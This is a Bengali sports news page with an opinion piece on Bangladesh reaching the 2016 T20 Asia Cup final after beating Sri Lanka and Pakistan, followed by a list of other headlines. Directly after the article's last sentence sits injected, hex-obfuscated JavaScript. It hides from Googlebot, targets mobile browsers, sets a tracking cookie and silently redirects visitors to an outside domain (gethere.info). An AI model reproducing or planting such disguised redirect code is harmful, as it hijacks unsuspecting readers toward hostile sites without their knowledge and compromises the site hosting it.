for Add

টি-টোয়েন্টির ভয় জয়

Mahmudullah
এশিয়া কাপের কাছে বাংলাদেশ ক্রিকেটের কৃতজ্ঞতার শেষ নেই। ১৯৮৮ সালে এই টুর্নামেন্টের মাধ্যমেই যে দেশের মাটিতে প্রথম আন্তর্জাতিক ম্যাচ খেলার স্বাদ পায় লাল-সবুজের দেশ। জহুরির দৃষ্টিতে দেখলে আন্তর্জাতিক ক্রিকেটে টাইগারদের পরাশক্তি হওয়ার বার্তা দেয়াও এই টুর্নামেন্টের মাধ্যমে। ২০১২ এশিয়া কাপের ফাইনালে খেলেই তো ওয়ানডে ক্রিকেটে নিজের শক্তির কথা জানান দিয়েছিল বাংলাদেশ। আর এবার প্রথমবারের মত আয়োজিত টি-টুয়েন্টি ফরমেটের ফাইনালে ওঠেও কি একই বার্তা দিল টাইগাররা?
টি-টুয়েন্টি ক্রিকেটই বাংলাদেশী ক্রিকেটারদের জন্য গণিতের সবচেয়ে কঠিন অধ্যায়! ব্যাপারটা স্কুলের সেই ভীতু ছাত্রের মত, উত্তর মেলে না এই ভয়ে পুরো অধ্যায়টাই বাদ দিয়ে দেয় এমন। কিন্তু ওয়ার্ল্ড টি-টোয়েন্টির আগে এশিয়া কাপের টি-টোয়েন্টি আসরটি যখন টেস্ট পরীক্ষা, তখন আর এই অধ্যায়কে চাপা রাখার উপায় কোথায়? বাংলাদেশও তাই অংকের ভীতি দূর করতে ওঠে পড়ে লাগলো। জিম্বাবুয়ের বিপক্ষে পূর্ব নির্ধারিত টেস্ট সিরিজকে রূপান্তর চার ম্যাচের টি-টোয়েন্টি সিরিজে। যেন টেস্টের আগে এ এক প্রি-টেস্টের মঞ্চায়ন। চন্ডিকা হাথুরুহিংসে তার শীষ্যদের রীতিমত প্রাক-নির্বাচনী পরীক্ষাই নিলেন সেখানে। যেখানে ২-২ এ সিরিজ ভাগাভাগি হওয়ায় সামনে ভালো করার প্রত্যাশার মাঝে বিপর্জয়ের আশঙ্কাও থেকে গেলো।

Mashrafe Mortaza, Mahmudullah
এই তো ছিল এশিয়া কাপের আগে বাংলাদশ ক্রিকেটের টি-টোয়েন্টি চিত্র। প্রায় দেড় বছর ধরে ওয়ানডে ক্রিকেটে নিজেদের স্বপ্নের সময় পার করছে যে দল, সেই দলই কিনা টি-টোয়েন্টিতে ভীত-সন্তস্ত্র। একারনেই তো এশিয়া কাপে একবার ফাইনাল খেলা সত্ত্বেও এবার প্রত্যাশার কোন উড়াউড়ি ছিল না। টি-টোয়েন্টি বলে কথা যে! তারপরও ক্রিকেট যাদের কাছে আবেগ, তারা নিজের প্রত্যাশার ফানুস উড়াতে গিয়ে কি আর যুক্তির কাছে হার মানেন!
এশিয়া কাপের ফাইনালে ওঠে সেই প্রত্যাশার ফানুস ওড়ানোদেরই তো জয় হলো। যারা স্বপ্ন দেখতে ভয় পেতেন তাদের স্বপ্নও কি এখন আকাশ ছুঁতে চাইছে না?
পাকিস্তানের বিপক্ষে জয়ের পর বাঁধ ভাঙ্গা আনন্দে মেতে ওঠেন মাশরাফি-মাহমুদউল্লাহ। ডাগ আউট থেকে ছুঁটে একে একে তাদেরকে আলিঙ্গনে বাঁধলেন সাকিব, মুশফিক, নাসিররা। টিভি পর্দার সা্মনে কিংবা গ্যালারিতে বসে আপনি কি তখন চোখ মুছছেন? নাকি বাংলাদেশ-বাংলাদেশ স্লোগানে ভাসিয়েছেন নিজের গলাও। এমন তো নয় টি-টোয়েন্টিতে বাংলাদেশ প্রথম জিতলো। তাহলে আবেগের ঢেউ এমন ভাবে আছড়ে পড়ছে কেন? উত্তর সবারই জানা। ২০১২ সালে এমন একটা ম্যাচেই তো (এশিয়া কাপের ফাইনাল) বাংলাদেশের মানুষকে বেদনায় ভাসিয়ে দিয়েছিল শহীদ আফ্রিদিরা। কেউ কি সেদিন ভেবেছিলেন এক আসর পরই সেই বেদনাটাই আফ্রিদিদের ফিরিয়ে দিবে মাশরাফির দল?

Mahmudullah
এশিয়া কাপের সেই ম্যাচে বাংলাদেশ হেরেছিল ঠিকই; কিন্তু সীমিত ওভারের ক্রিকেট বিশ্বে নিজেদের প্রতিষ্ঠার জোড়ালো দাবি জানিয়ে রেখেছিল। টি-টোয়েন্টিতেও যেন বাংলাদেশের সম্মুখ গতি এখন একই পথে।
ভারতের বিপক্ষে ফাইনালের ফল কি হবে তা না হয় সময়ের হাতেই তোলা থাকলো। কিন্তু টি-টোয়েন্টির দুই বিশ্ব চ্যাম্পিয়নকে (শ্রীলঙ্কা, পাকিস্তান) পরপর দুই ম্যাচে হারিয়ে ফাইনাল খেলছে যে দল, সেই দলকে সমীহ না করার সাহস কি ধোনীও দেখাবেন? এশিয়া কাপ তো বটেই ওয়ার্ল্ড টি-টোয়েন্টিতেই ফেভরিটের বড় তকমা ভারতের গায়ে। কে জানে ৬ মার্চ মিরপুরের ফেভারিটের সেই তকমা বাংলাদেশের গায়েও লেগে যায় কিনা!
লাগলে লাগুগ। না লাগলে নেই। আপাতত না হয় প্রথমবারের মত টি-টোয়েন্টি ফরম্যাটে আয়োজিত এশিয়া কাপটা ঘরে তুলে ইতিহাস হয়ে থাকুক বাংলাদেশ। এ এশিয়া কাপ দিয়েইতো টি-টোয়েন্টি ভয়টা জয় করে ফেলেছে টাইগাররা।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add